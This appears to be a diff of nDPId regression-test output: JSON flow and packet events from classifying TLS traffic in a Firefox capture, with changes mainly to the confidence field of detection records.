00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620927998817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998817,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yX\/JSxfE3khkHaAS\/oi4VgAAAgQFrAQCCAo8IAs5NAyYZQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620927998817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998817,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6Esl\/AbveSGQdyUsXxYAQECzVWgAAAQEICjQMmII8IAs5"} 
-00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998782,"flow_last_seen":1620927998820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998820,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620927998833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927998833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yYRFBnlrQn7ZPaAS\/ogBdQAAAgQFrAQCCAo8IAtKNAyYeQEDAwc="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620927998833,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927998833,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmEAbtCftk9RQZ5bIAQECwefwAAAQEICjQMmJA8IAtK"} -00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00876{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -30,18 +30,18 @@ 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"} 
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
